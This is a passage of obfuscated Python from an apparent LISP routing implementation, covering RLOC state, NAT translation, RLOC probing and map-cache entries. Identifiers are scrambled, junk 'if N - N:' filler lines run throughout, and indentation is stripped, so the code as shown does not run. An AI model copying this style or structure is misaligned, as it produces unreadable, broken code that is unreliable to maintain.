O0oo = copy . deepcopy ( self )
O0oo . rloc_next_hop = iiIIII1I1ii
I1IIII . next_rloc = O0oo
I1IIII = O0oo
if 49 - 49: I11i + o0oOOo0O0Ooo % OOooOOo . iII111i
if 11 - 11: I1Ii111 - ooOoO0o
if 76 - 76: oO0o - i1IIi - O0 % Oo0Ooo
def up_state ( self ) :
return ( self . state == LISP_RLOC_UP_STATE )
if 66 - 66: IiII % iII111i / o0oOOo0O0Ooo
if 44 - 44: iIii1I11I1II1 + o0oOOo0O0Ooo + OoO0O00 * II111iiii
def unreach_state ( self ) :
return ( self . state == LISP_RLOC_UNREACH_STATE )
if 84 - 84: Oo0Ooo * I1Ii111 - o0oOOo0O0Ooo % Ii1I
if 69 - 69: I11i + OoOoOO00 - i11iIiiIii * O0 % O0
def no_echoed_nonce_state ( self ) :
return ( self . state == LISP_RLOC_NO_ECHOED_NONCE_STATE )
if 81 - 81: I11i - o0oOOo0O0Ooo % Ii1I / I1Ii111 * II111iiii
if 40 - 40: OoO0O00 . i11iIiiIii
def down_state ( self ) :
return ( self . state in [ LISP_RLOC_DOWN_STATE , LISP_RLOC_ADMIN_DOWN_STATE ] )
if 36 - 36: o0oOOo0O0Ooo * iII111i / I1ii11iIi11i % i1IIi % I1ii11iIi11i + i11iIiiIii
if 24 - 24: I1Ii111 / ooOoO0o - i11iIiiIii
if 32 - 32: II111iiii * Ii1I . ooOoO0o * Oo0Ooo - I1ii11iIi11i % I11i
def print_state ( self ) :
if ( self . state is LISP_RLOC_UNKNOWN_STATE ) :
return ( "unknown-state" )
if ( self . state is LISP_RLOC_UP_STATE ) :
return ( "up-state" )
if ( self . state is LISP_RLOC_DOWN_STATE ) :
return ( "down-state" )
if ( self . state is LISP_RLOC_ADMIN_DOWN_STATE ) :
return ( "admin-down-state" )
if ( self . state is LISP_RLOC_UNREACH_STATE ) :
return ( "unreach-state" )
if ( self . state is LISP_RLOC_NO_ECHOED_NONCE_STATE ) :
return ( "no-echoed-nonce-state" )
return ( "invalid-state" )
if 96 - 96: Ii1I / OOooOOo / O0
if 8 - 8: iII111i + OOooOOo / I1ii11iIi11i . iII111i
def print_rloc ( self , indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
lprint ( "{}rloc {}, uptime {}, {}, parms {}/{}/{}/{}" . format ( indent ,
red ( self . rloc . print_address ( ) , False ) , Oo0OO0000oooo , self . print_state ( ) ,
self . priority , self . weight , self . mpriority , self . mweight ) )
if 45 - 45: i1IIi
if 28 - 28: iII111i
def print_rloc_name ( self , cour = False ) :
if ( self . rloc_name == None ) : return ( "" )
IiIi1I1i1iII = self . rloc_name
if ( cour ) : IiIi1I1i1iII = lisp_print_cour ( IiIi1I1i1iII )
return ( 'rloc-name: {}' . format ( blue ( IiIi1I1i1iII , cour ) ) )
if 28 - 28: i1IIi - iII111i + o0oOOo0O0Ooo / Oo0Ooo * oO0o
if 8 - 8: ooOoO0o + OOooOOo * ooOoO0o / i1IIi . I1ii11iIi11i
def store_rloc_from_record ( self , rloc_record , nonce , source ) :
IiI1iI1 = LISP_DATA_PORT
self . rloc . copy_address ( rloc_record . rloc )
self . rloc_name = rloc_record . rloc_name
if 4 - 4: Ii1I - Oo0Ooo . i1IIi + iIii1I11I1II1
if 28 - 28: O0 / ooOoO0o / IiII - I11i + IiII + OoO0O00
if 84 - 84: Oo0Ooo + OoOoOO00 / iII111i . I1ii11iIi11i
if 26 - 26: Oo0Ooo
oOo00O = self . rloc
if ( oOo00O . is_null ( ) == False ) :
O00OOoOOO0O0O = lisp_get_nat_info ( oOo00O , self . rloc_name )
if ( O00OOoOOO0O0O ) :
IiI1iI1 = O00OOoOOO0O0O . port
oO0 = lisp_nat_state_info [ self . rloc_name ] [ 0 ]
oo0o00OO = oOo00O . print_address_no_iid ( )
o0O00oo0O = red ( oo0o00OO , False )
OOOoOo000O = "" if self . rloc_name == None else blue ( self . rloc_name , False )
if 12 - 12: oO0o + ooOoO0o * IiII
if 84 - 84: o0oOOo0O0Ooo * o0oOOo0O0Ooo + OoOoOO00 % o0oOOo0O0Ooo + I1IiiI
if 89 - 89: II111iiii
if 41 - 41: iIii1I11I1II1
if 26 - 26: Oo0Ooo / i1IIi + Oo0Ooo
if 76 - 76: I1ii11iIi11i * i1IIi % oO0o
if ( O00OOoOOO0O0O . timed_out ( ) ) :
lprint ( ( " Matched stored NAT state timed out for " + "RLOC {}:{}, {}" ) . format ( o0O00oo0O , IiI1iI1 , OOOoOo000O ) )
if 80 - 80: i1IIi * II111iiii . O0 % I1ii11iIi11i / ooOoO0o
if 58 - 58: I1IiiI * I1ii11iIi11i - i1IIi % I1Ii111 % O0
O00OOoOOO0O0O = None if ( O00OOoOOO0O0O == oO0 ) else oO0
if ( O00OOoOOO0O0O and O00OOoOOO0O0O . timed_out ( ) ) :
IiI1iI1 = O00OOoOOO0O0O . port
o0O00oo0O = red ( O00OOoOOO0O0O . address , False )
lprint ( ( " Youngest stored NAT state timed out " + " for RLOC {}:{}, {}" ) . format ( o0O00oo0O , IiI1iI1 ,
# OoO0O00 + I11i
OOOoOo000O ) )
O00OOoOOO0O0O = None
if 82 - 82: oO0o % I1IiiI % OoooooooOO . iII111i . oO0o
if 62 - 62: i1IIi . II111iiii . IiII * OOooOOo % i11iIiiIii * I11i
if 48 - 48: I1Ii111 - O0
if 23 - 23: iIii1I11I1II1
if 88 - 88: I1IiiI + iII111i / Ii1I
if 57 - 57: o0oOOo0O0Ooo
if 69 - 69: i1IIi / i1IIi / OoOoOO00 + ooOoO0o % I1Ii111
if ( O00OOoOOO0O0O ) :
if ( O00OOoOOO0O0O . address != oo0o00OO ) :
lprint ( "RLOC conflict, RLOC-record {}, NAT state {}" . format ( o0O00oo0O , red ( O00OOoOOO0O0O . address , False ) ) )
if 41 - 41: II111iiii * OOooOOo
self . rloc . store_address ( O00OOoOOO0O0O . address )
if 8 - 8: I1Ii111 + O0
o0O00oo0O = red ( O00OOoOOO0O0O . address , False )
IiI1iI1 = O00OOoOOO0O0O . port
lprint ( " Use NAT translated RLOC {}:{} for {}" . format ( o0O00oo0O , IiI1iI1 , OOOoOo000O ) )
if 67 - 67: iIii1I11I1II1 . O0
self . store_translated_rloc ( oOo00O , IiI1iI1 )
if 40 - 40: OOooOOo - ooOoO0o . OoooooooOO % O0 * I11i - I1ii11iIi11i
if 92 - 92: ooOoO0o % oO0o / i11iIiiIii
if 91 - 91: OOooOOo
if 60 - 60: i11iIiiIii . iIii1I11I1II1 . OOooOOo % IiII
self . geo = rloc_record . geo
self . elp = rloc_record . elp
self . json = rloc_record . json
if 68 - 68: I11i / iII111i - IiII . iIii1I11I1II1 / o0oOOo0O0Ooo
if 54 - 54: II111iiii * I1IiiI
if 49 - 49: I1ii11iIi11i
if 31 - 31: o0oOOo0O0Ooo - OoOoOO00 + I1ii11iIi11i . oO0o - O0
self . rle = rloc_record . rle
if ( self . rle ) :
for iIIII1iiIII in self . rle . rle_nodes :
IiIi1I1i1iII = iIIII1iiIII . rloc_name
O00OOoOOO0O0O = lisp_get_nat_info ( iIIII1iiIII . address , IiIi1I1i1iII )
if ( O00OOoOOO0O0O == None ) : continue
if 61 - 61: I1ii11iIi11i * II111iiii . i1IIi
IiI1iI1 = O00OOoOOO0O0O . port
iIii1iii1 = IiIi1I1i1iII
if ( iIii1iii1 ) : iIii1iii1 = blue ( IiIi1I1i1iII , False )
if 60 - 60: OoooooooOO % ooOoO0o * i11iIiiIii * OoooooooOO % IiII
lprint ( ( " Store translated encap-port {} for RLE-" + "node {}, rloc-name '{}'" ) . format ( IiI1iI1 ,
# i11iIiiIii
iIIII1iiIII . address . print_address_no_iid ( ) , iIii1iii1 ) )
iIIII1iiIII . translated_port = IiI1iI1
if 61 - 61: I1Ii111 . OoO0O00 % I1ii11iIi11i
if 29 - 29: o0oOOo0O0Ooo
if 80 - 80: OOooOOo + OoO0O00 - OOooOOo
self . priority = rloc_record . priority
self . mpriority = rloc_record . mpriority
self . weight = rloc_record . weight
self . mweight = rloc_record . mweight
if ( rloc_record . reach_bit and rloc_record . local_bit and
rloc_record . probe_bit == False ) : self . state = LISP_RLOC_UP_STATE
if 93 - 93: OoooooooOO + iIii1I11I1II1 * I1IiiI * Ii1I
if 50 - 50: O0 - OOooOOo * O0 * o0oOOo0O0Ooo % I1Ii111
if 35 - 35: i11iIiiIii / iIii1I11I1II1 + OoooooooOO + iII111i
if 90 - 90: Ii1I . o0oOOo0O0Ooo
iIiIIi1II = source . is_exact_match ( rloc_record . rloc ) if source != None else None
if 59 - 59: OoOoOO00 * I1Ii111 * iIii1I11I1II1
if ( rloc_record . keys != None and iIiIIi1II ) :
ii1i1I1111ii = rloc_record . keys [ 1 ]
if ( ii1i1I1111ii != None ) :
oo0o00OO = rloc_record . rloc . print_address_no_iid ( ) + ":" + str ( IiI1iI1 )
if 5 - 5: i11iIiiIii / o0oOOo0O0Ooo
ii1i1I1111ii . add_key_by_rloc ( oo0o00OO , True )
lprint ( " Store encap-keys for nonce 0x{}, RLOC {}" . format ( lisp_hex_string ( nonce ) , red ( oo0o00OO , False ) ) )
if 45 - 45: I1Ii111 + OoooooooOO + o0oOOo0O0Ooo * II111iiii
if 12 - 12: I1ii11iIi11i / O0
if 18 - 18: OoOoOO00 . i11iIiiIii + i1IIi / OoooooooOO - IiII % OoO0O00
return ( IiI1iI1 )
if 47 - 47: iII111i % IiII + I1Ii111 * o0oOOo0O0Ooo * OoooooooOO
if 100 - 100: Oo0Ooo / I1IiiI / iII111i / I1Ii111 / oO0o % o0oOOo0O0Ooo
def store_translated_rloc ( self , rloc , port ) :
self . rloc . copy_address ( rloc )
self . translated_rloc . copy_address ( rloc )
self . translated_port = port
if 16 - 16: I1IiiI + I11i
if 66 - 66: OoooooooOO % II111iiii / I1Ii111 . i11iIiiIii
def is_rloc_translated ( self ) :
return ( self . translated_rloc . is_null ( ) == False )
if 67 - 67: Ii1I + Oo0Ooo - I1IiiI - IiII + oO0o + Oo0Ooo
if 84 - 84: I1ii11iIi11i % oO0o - OOooOOo * Ii1I
def rloc_exists ( self ) :
if ( self . rloc . is_null ( ) == False ) : return ( True )
if ( self . rle_name or self . geo_name or self . elp_name or self . json_name ) :
return ( False )
if 78 - 78: i1IIi / ooOoO0o / oO0o
return ( True )
if 21 - 21: IiII % Ii1I + OOooOOo + IiII
if 90 - 90: o0oOOo0O0Ooo
def is_rtr ( self ) :
return ( ( self . priority == 254 and self . mpriority == 255 and self . weight == 0 and self . mweight == 0 ) )
if 38 - 38: OoOoOO00 / OOooOOo % OoooooooOO * I1ii11iIi11i
if 7 - 7: I11i * O0 + Oo0Ooo / O0 * oO0o + i11iIiiIii
if 74 - 74: OoOoOO00
def print_state_change ( self , new_state ) :
Oo000 = self . print_state ( )
iI = "{} -> {}" . format ( Oo000 , new_state )
if ( new_state == "up" and self . unreach_state ( ) ) :
iI = bold ( iI , False )
if 66 - 66: i11iIiiIii . I11i % IiII % OoO0O00
return ( iI )
if 25 - 25: OoO0O00 % Oo0Ooo / Ii1I / Ii1I * IiII
if 33 - 33: ooOoO0o
def print_rloc_probe_rtt ( self ) :
if ( self . rloc_probe_rtt == - 1 ) : return ( "none" )
return ( self . rloc_probe_rtt )
if 14 - 14: Oo0Ooo % I1Ii111 % ooOoO0o . oO0o * iIii1I11I1II1 . I1ii11iIi11i
if 50 - 50: O0 * i11iIiiIii / iIii1I11I1II1 . I11i + i11iIiiIii
def print_recent_rloc_probe_rtts ( self ) :
OO0Ooo = str ( self . recent_rloc_probe_rtts )
OO0Ooo = OO0Ooo . replace ( "-1" , "?" )
return ( OO0Ooo )
if 23 - 23: I1ii11iIi11i
if 68 - 68: OoO0O00 . oO0o / IiII - II111iiii % Oo0Ooo
def compute_rloc_probe_rtt ( self ) :
I1IIII = self . rloc_probe_rtt
self . rloc_probe_rtt = - 1
if ( self . last_rloc_probe_reply == None ) : return
if ( self . last_rloc_probe == None ) : return
self . rloc_probe_rtt = self . last_rloc_probe_reply - self . last_rloc_probe
self . rloc_probe_rtt = round ( self . rloc_probe_rtt , 3 )
IiIIi = self . recent_rloc_probe_rtts
self . recent_rloc_probe_rtts = [ I1IIII ] + IiIIi [ 0 : - 1 ]
if 65 - 65: iII111i % oO0o * IiII
if 16 - 16: iII111i % I11i % OoOoOO00
def print_rloc_probe_hops ( self ) :
return ( self . rloc_probe_hops )
if 80 - 80: OoooooooOO * i11iIiiIii % oO0o / Oo0Ooo - I1ii11iIi11i
if 92 - 92: o0oOOo0O0Ooo % i1IIi / I1Ii111 % ooOoO0o / oO0o
def print_recent_rloc_probe_hops ( self ) :
IiI1 = str ( self . recent_rloc_probe_hops )
return ( IiI1 )
if 80 - 80: iIii1I11I1II1 . II111iiii
if 50 - 50: o0oOOo0O0Ooo - O0 + OoO0O00
def store_rloc_probe_hops ( self , to_hops , from_ttl ) :
if ( to_hops == 0 ) :
to_hops = "?"
elif ( to_hops < LISP_RLOC_PROBE_TTL / 2 ) :
to_hops = "!"
else :
to_hops = str ( LISP_RLOC_PROBE_TTL - to_hops )
if 22 - 22: I1Ii111 % O0 / I1Ii111 / I1Ii111
if ( from_ttl < LISP_RLOC_PROBE_TTL / 2 ) :
oO0ooo = "!"
else :
oO0ooo = str ( LISP_RLOC_PROBE_TTL - from_ttl )
if 64 - 64: O0 * OOooOOo * I1IiiI - o0oOOo0O0Ooo
if 86 - 86: i1IIi
I1IIII = self . rloc_probe_hops
self . rloc_probe_hops = to_hops + "/" + oO0ooo
IiIIi = self . recent_rloc_probe_hops
self . recent_rloc_probe_hops = [ I1IIII ] + IiIIi [ 0 : - 1 ]
if 84 - 84: OoOoOO00
if 31 - 31: iIii1I11I1II1 + I1IiiI
def process_rloc_probe_reply ( self , nonce , eid , group , hop_count , ttl ) :
oOo00O = self
while ( True ) :
if ( oOo00O . last_rloc_probe_nonce == nonce ) : break
oOo00O = oOo00O . next_rloc
if ( oOo00O == None ) :
lprint ( " No matching nonce state found for nonce 0x{}" . format ( lisp_hex_string ( nonce ) ) )
if 82 - 82: I1Ii111 / Ii1I % OoooooooOO - IiII / OoooooooOO
return
if 23 - 23: iIii1I11I1II1
if 7 - 7: IiII / OOooOOo + Oo0Ooo . I1IiiI
if 33 - 33: I1Ii111 + OoooooooOO
oOo00O . last_rloc_probe_reply = lisp_get_timestamp ( )
oOo00O . compute_rloc_probe_rtt ( )
ooiii1iiI1 = oOo00O . print_state_change ( "up" )
if ( oOo00O . state != LISP_RLOC_UP_STATE ) :
lisp_update_rtr_updown ( oOo00O . rloc , True )
oOo00O . state = LISP_RLOC_UP_STATE
oOo00O . last_state_change = lisp_get_timestamp ( )
IiiiiII1i = lisp_map_cache . lookup_cache ( eid , True )
if ( IiiiiII1i ) : lisp_write_ipc_map_cache ( True , IiiiiII1i )
if 48 - 48: II111iiii % I1ii11iIi11i - II111iiii
if 29 - 29: I1Ii111 - I1Ii111 - I11i * iIii1I11I1II1 % OoO0O00 % IiII
oOo00O . store_rloc_probe_hops ( hop_count , ttl )
if 73 - 73: i1IIi . OoooooooOO / OoOoOO00 % Ii1I / Ii1I / Ii1I
OOO0oOooOOo00 = bold ( "RLOC-probe reply" , False )
oo0o00OO = oOo00O . rloc . print_address_no_iid ( )
i1i1I1I1 = bold ( str ( oOo00O . print_rloc_probe_rtt ( ) ) , False )
III1I1Iii1 = ":{}" . format ( self . translated_port ) if self . translated_port != 0 else ""
if 6 - 6: iIii1I11I1II1 / oO0o % ooOoO0o
iiIIII1I1ii = ""
if ( oOo00O . rloc_next_hop != None ) :
OooOOOoOoo0O0 , IiI1Ii = oOo00O . rloc_next_hop
iiIIII1I1ii = ", nh {}({})" . format ( IiI1Ii , OooOOOoOoo0O0 )
if 1 - 1: Ii1I * I1IiiI + Oo0Ooo + IiII + OOooOOo
if 61 - 61: OoO0O00 . i1IIi / Ii1I % iII111i + Ii1I / i1IIi
oOo = green ( lisp_print_eid_tuple ( eid , group ) , False )
lprint ( ( " Received {} from {}{} for {}, {}, rtt {}{}, " + "to-ttl/from-ttl {}" ) . format ( OOO0oOooOOo00 , red ( oo0o00OO , False ) , III1I1Iii1 , oOo ,
# O0
ooiii1iiI1 , i1i1I1I1 , iiIIII1I1ii , str ( hop_count ) + "/" + str ( ttl ) ) )
if 40 - 40: O0
if ( oOo00O . rloc_next_hop == None ) : return
if 87 - 87: i1IIi / OoooooooOO . o0oOOo0O0Ooo % IiII
if 22 - 22: OoO0O00 . OOooOOo
if 95 - 95: OOooOOo + Oo0Ooo - OoOoOO00
if 33 - 33: OoO0O00
oOo00O = None
o0O0 = None
while ( True ) :
oOo00O = self if oOo00O == None else oOo00O . next_rloc
if ( oOo00O == None ) : break
if ( oOo00O . up_state ( ) == False ) : continue
if ( oOo00O . rloc_probe_rtt == - 1 ) : continue
if 79 - 79: OOooOOo % I1Ii111 / IiII - Oo0Ooo
if ( o0O0 == None ) : o0O0 = oOo00O
if ( oOo00O . rloc_probe_rtt < o0O0 . rloc_probe_rtt ) : o0O0 = oOo00O
if 48 - 48: Oo0Ooo * iII111i - Oo0Ooo + I11i % II111iiii
if 71 - 71: OoOoOO00 % o0oOOo0O0Ooo . oO0o
if ( o0O0 != None ) :
OooOOOoOoo0O0 , IiI1Ii = o0O0 . rloc_next_hop
iiIIII1I1ii = bold ( "nh {}({})" . format ( IiI1Ii , OooOOOoOoo0O0 ) , False )
lprint ( " Install host-route via best {}" . format ( iiIIII1I1ii ) )
lisp_install_host_route ( oo0o00OO , None , False )
lisp_install_host_route ( oo0o00OO , IiI1Ii , True )
if 65 - 65: OoO0O00
if 48 - 48: OoO0O00
if 59 - 59: OoooooooOO + I11i . oO0o
def add_to_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
IiI1iI1 = self . translated_port
if ( IiI1iI1 != 0 ) : oo0o00OO += ":" + str ( IiI1iI1 )
if 65 - 65: I1ii11iIi11i * II111iiii % I11i + II111iiii . i1IIi / ooOoO0o
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) :
lisp_rloc_probe_list [ oo0o00OO ] = [ ]
if 74 - 74: OoOoOO00 % OoO0O00 . OoOoOO00
if 16 - 16: OoO0O00 / Ii1I * i11iIiiIii / o0oOOo0O0Ooo + I1Ii111
if ( group . is_null ( ) ) : group . instance_id = 0
for i11iII1IiI , oOo , i11ii in lisp_rloc_probe_list [ oo0o00OO ] :
if ( oOo . is_exact_match ( eid ) and i11ii . is_exact_match ( group ) ) :
if ( i11iII1IiI == self ) :
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
if 21 - 21: I11i % I1ii11iIi11i
return
if 8 - 8: OOooOOo % OoO0O00 + O0 - o0oOOo0O0Ooo
lisp_rloc_probe_list [ oo0o00OO ] . remove ( [ i11iII1IiI , oOo , i11ii ] )
break
if 46 - 46: Oo0Ooo . ooOoO0o + OoOoOO00 - I11i / i11iIiiIii . iII111i
if 80 - 80: II111iiii + OoO0O00 % ooOoO0o + i11iIiiIii
lisp_rloc_probe_list [ oo0o00OO ] . append ( [ self , eid , group ] )
if 30 - 30: Ii1I / I1ii11iIi11i % IiII - Oo0Ooo
if 100 - 100: IiII . I1Ii111 * oO0o % OoO0O00 . iIii1I11I1II1 * Oo0Ooo
if 100 - 100: IiII - OoOoOO00 % iII111i
if 24 - 24: Oo0Ooo / OoO0O00 + i11iIiiIii
if 81 - 81: i11iIiiIii . iIii1I11I1II1 - OoooooooOO
oOo00O = lisp_rloc_probe_list [ oo0o00OO ] [ 0 ] [ 0 ]
if ( oOo00O . state == LISP_RLOC_UNREACH_STATE ) :
self . state = LISP_RLOC_UNREACH_STATE
self . last_state_change = lisp_get_timestamp ( )
if 52 - 52: O0 - I1Ii111 + oO0o % ooOoO0o . oO0o
if 60 - 60: oO0o + o0oOOo0O0Ooo - OOooOOo % o0oOOo0O0Ooo . I11i + OoO0O00
if 27 - 27: i11iIiiIii - I1ii11iIi11i * I1Ii111 . I1IiiI / OoO0O00 * ooOoO0o
def delete_from_rloc_probe_list ( self , eid , group ) :
oo0o00OO = self . rloc . print_address_no_iid ( )
IiI1iI1 = self . translated_port
if ( IiI1iI1 != 0 ) : oo0o00OO += ":" + str ( IiI1iI1 )
if ( lisp_rloc_probe_list . has_key ( oo0o00OO ) == False ) : return
if 42 - 42: OOooOOo
iiI11i = [ ]
for I1iII11ii1 in lisp_rloc_probe_list [ oo0o00OO ] :
if ( I1iII11ii1 [ 0 ] != self ) : continue
if ( I1iII11ii1 [ 1 ] . is_exact_match ( eid ) == False ) : continue
if ( I1iII11ii1 [ 2 ] . is_exact_match ( group ) == False ) : continue
iiI11i = I1iII11ii1
break
if 22 - 22: Ii1I / ooOoO0o / o0oOOo0O0Ooo % I1ii11iIi11i . iIii1I11I1II1
if ( iiI11i == [ ] ) : return
if 78 - 78: OoO0O00 . I1ii11iIi11i / ooOoO0o + OoO0O00 / I1ii11iIi11i * ooOoO0o
try :
lisp_rloc_probe_list [ oo0o00OO ] . remove ( iiI11i )
if ( lisp_rloc_probe_list [ oo0o00OO ] == [ ] ) :
lisp_rloc_probe_list . pop ( oo0o00OO )
if 96 - 96: IiII % iII111i . OoOoOO00 / oO0o . OoO0O00
except :
return
if 85 - 85: iIii1I11I1II1 / OoOoOO00 * I1ii11iIi11i
if 26 - 26: iII111i - OoO0O00 . o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . O0 . OoOoOO00 + I1Ii111 + OoooooooOO . i11iIiiIii
def print_rloc_probe_state ( self , trailing_linefeed ) :
Oo0Ooo0O0 = ""
oOo00O = self
while ( True ) :
oooOoOoooo = oOo00O . last_rloc_probe
if ( oooOoOoooo == None ) : oooOoOoooo = 0
iiIi1iI1Ii = oOo00O . last_rloc_probe_reply
if ( iiIi1iI1Ii == None ) : iiIi1iI1Ii = 0
i1i1I1I1 = oOo00O . print_rloc_probe_rtt ( )
IiII1iiI = space ( 4 )
if 26 - 26: OoooooooOO
if ( oOo00O . rloc_next_hop == None ) :
Oo0Ooo0O0 += "RLOC-Probing:\n"
else :
OooOOOoOoo0O0 , IiI1Ii = oOo00O . rloc_next_hop
Oo0Ooo0O0 += "RLOC-Probing for nh {}({}):\n" . format ( IiI1Ii , OooOOOoOoo0O0 )
if 79 - 79: I1IiiI + I1IiiI
if 45 - 45: oO0o + I1IiiI / oO0o
Oo0Ooo0O0 += ( "{}RLOC-probe request sent: {}\n{}RLOC-probe reply " + "received: {}, rtt {}" ) . format ( IiII1iiI , lisp_print_elapsed ( oooOoOoooo ) ,
# OOooOOo % OoooooooOO
IiII1iiI , lisp_print_elapsed ( iiIi1iI1Ii ) , i1i1I1I1 )
if 15 - 15: Oo0Ooo % OoooooooOO * OOooOOo * IiII / OoooooooOO / i11iIiiIii
if ( trailing_linefeed ) : Oo0Ooo0O0 += "\n"
if 11 - 11: o0oOOo0O0Ooo / Oo0Ooo
oOo00O = oOo00O . next_rloc
if ( oOo00O == None ) : break
Oo0Ooo0O0 += "\n"
if 53 - 53: I1ii11iIi11i + ooOoO0o - I1ii11iIi11i + I11i
return ( Oo0Ooo0O0 )
if 12 - 12: iII111i / II111iiii . OoOoOO00 - OOooOOo
if 23 - 23: ooOoO0o + ooOoO0o . I11i
def get_encap_keys ( self ) :
IiI1iI1 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 90 - 90: I1Ii111 / iIii1I11I1II1 / oO0o
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + IiI1iI1
if 47 - 47: i11iIiiIii - OOooOOo / I1IiiI % o0oOOo0O0Ooo % I1IiiI % I11i
try :
oOoo0oO = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ]
if ( oOoo0oO [ 1 ] ) : return ( oOoo0oO [ 1 ] . encrypt_key , oOoo0oO [ 1 ] . icv_key )
return ( None , None )
except :
return ( None , None )
if 26 - 26: OoOoOO00 * ooOoO0o
if 23 - 23: Ii1I + i1IIi + IiII - O0 / OOooOOo
if 82 - 82: I1Ii111
def rloc_recent_rekey ( self ) :
IiI1iI1 = "4341" if self . translated_port == 0 else str ( self . translated_port )
if 78 - 78: I1Ii111 % oO0o * iIii1I11I1II1
oo0o00OO = self . rloc . print_address_no_iid ( ) + ":" + IiI1iI1
if 1 - 1: i1IIi . iIii1I11I1II1
try :
ii1i1I1111ii = lisp_crypto_keys_by_rloc_encap [ oo0o00OO ] [ 1 ]
if ( ii1i1I1111ii == None ) : return ( False )
if ( ii1i1I1111ii . last_rekey == None ) : return ( True )
return ( time . time ( ) - ii1i1I1111ii . last_rekey < 1 )
except :
return ( False )
if 2 - 2: OOooOOo % Oo0Ooo * OOooOOo + I1Ii111 % OoOoOO00 / O0
if 23 - 23: O0 * oO0o / I1IiiI + i1IIi * O0 % oO0o
if 11 - 11: I1Ii111 . OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i - ooOoO0o . iII111i
if 71 - 71: i11iIiiIii + I11i / i11iIiiIii % Oo0Ooo / iIii1I11I1II1 * OoO0O00
class lisp_mapping ( ) :
def __init__ ( self , eid , group , rloc_set ) :
self . eid = eid
if ( eid == "" ) : self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = group
if ( group == "" ) : self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . rloc_set = rloc_set
self . best_rloc_set = [ ]
self . build_best_rloc_set ( )
self . uptime = lisp_get_timestamp ( )
self . action = LISP_NO_ACTION
self . expires = None
self . map_cache_ttl = None
self . last_refresh_time = self . uptime
self . source_cache = None
self . map_replies_sent = 0
self . mapping_source = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . use_mr_name = "all"
self . use_ms_name = "all"
self . stats = lisp_stats ( )
self . dynamic_eids = None
self . checkpoint_entry = False
self . secondary_iid = None
self . signature_eid = False
self . gleaned = False
self . recent_sources = { }
self . last_multicast_map_request = 0
if 49 - 49: iII111i + OoOoOO00
if 33 - 33: ooOoO0o
def print_mapping ( self , eid_indent , rloc_indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
O0o00oOOOO00 = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 19 - 19: I1Ii111 % IiII
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , O0o00oOOOO00 , Oo0OO0000oooo ,
len ( self . rloc_set ) ) )
for oOo00O in self . rloc_set : oOo00O . print_rloc ( rloc_indent )
if 94 - 94: I1Ii111 * I1ii11iIi11i * I1ii11iIi11i - o0oOOo0O0Ooo . i11iIiiIii
if 16 - 16: i1IIi
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 88 - 88: OOooOOo
if 79 - 79: oO0o
def print_ttl ( self ) :
oo0o = self . map_cache_ttl
if ( oo0o == None ) : return ( "forever" )
if 52 - 52: oO0o + OoO0O00 / OoooooooOO - iIii1I11I1II1 / iII111i - oO0o
if ( oo0o >= 3600 ) :
if ( ( oo0o % 3600 ) == 0 ) :
oo0o = str ( oo0o / 3600 ) + " hours"
else :
oo0o = str ( oo0o * 60 ) + " mins"
if 68 - 68: I1IiiI - OoOoOO00 - iIii1I11I1II1 % i11iIiiIii * OoOoOO00 * OoO0O00
elif ( oo0o >= 60 ) :
if ( ( oo0o % 60 ) == 0 ) :
oo0o = str ( oo0o / 60 ) + " mins"
else :
oo0o = str ( oo0o ) + " secs"
if 97 - 97: OoO0O00 - IiII + ooOoO0o % iIii1I11I1II1 % iII111i
else :
oo0o = str ( oo0o ) + " secs"
if 100 - 100: IiII - Ii1I * iIii1I11I1II1 . iII111i . i1IIi % Oo0Ooo
return ( oo0o )
if 11 - 11: I11i + oO0o % Ii1I
if 22 - 22: ooOoO0o
def refresh ( self ) :
if ( self . group . is_null ( ) ) : return ( self . refresh_unicast ( ) )
return ( self . refresh_multicast ( ) )
if 83 - 83: OOooOOo - i11iIiiIii - i1IIi / oO0o
if 33 - 33: OoO0O00 + OOooOOo
def refresh_unicast ( self ) :
return ( self . is_active ( ) and self . has_ttl_elapsed ( ) and
self . gleaned == False )
if 36 - 36: o0oOOo0O0Ooo . o0oOOo0O0Ooo / oO0o * ooOoO0o * Ii1I * IiII
if 39 - 39: i1IIi
def refresh_multicast ( self ) :
if 79 - 79: ooOoO0o - II111iiii - oO0o
if 55 - 55: iII111i % iIii1I11I1II1 + Ii1I + oO0o . i11iIiiIii - OOooOOo
if 14 - 14: oO0o - i11iIiiIii / OoOoOO00 % o0oOOo0O0Ooo / IiII * I1IiiI
if 2 - 2: i1IIi / I1Ii111 + I1IiiI + I1ii11iIi11i - o0oOOo0O0Ooo + iIii1I11I1II1
if 78 - 78: I1ii11iIi11i % i1IIi . I1Ii111 + Oo0Ooo . o0oOOo0O0Ooo % II111iiii
oO000o0Oo00 = int ( ( time . time ( ) - self . uptime ) % self . map_cache_ttl )
O0ii1i = ( oO000o0Oo00 in [ 0 , 1 , 2 ] )
if ( O0ii1i == False ) : return ( False )
if 75 - 75: I1IiiI * oO0o / Oo0Ooo - II111iiii . OoO0O00
if 8 - 8: iII111i . i11iIiiIii . IiII . I1ii11iIi11i + I11i
if 24 - 24: I1IiiI - I1IiiI . Oo0Ooo * IiII + I1IiiI / i1IIi
if 18 - 18: II111iiii / iIii1I11I1II1 * I1ii11iIi11i . ooOoO0o * ooOoO0o
ooOoOoooo = ( ( time . time ( ) - self . last_multicast_map_request ) <= 2 )
if ( ooOoOoooo ) : return ( False )
if 92 - 92: IiII + OoO0O00 + Oo0Ooo + oO0o
self . last_multicast_map_request = lisp_get_timestamp ( )
return ( True )
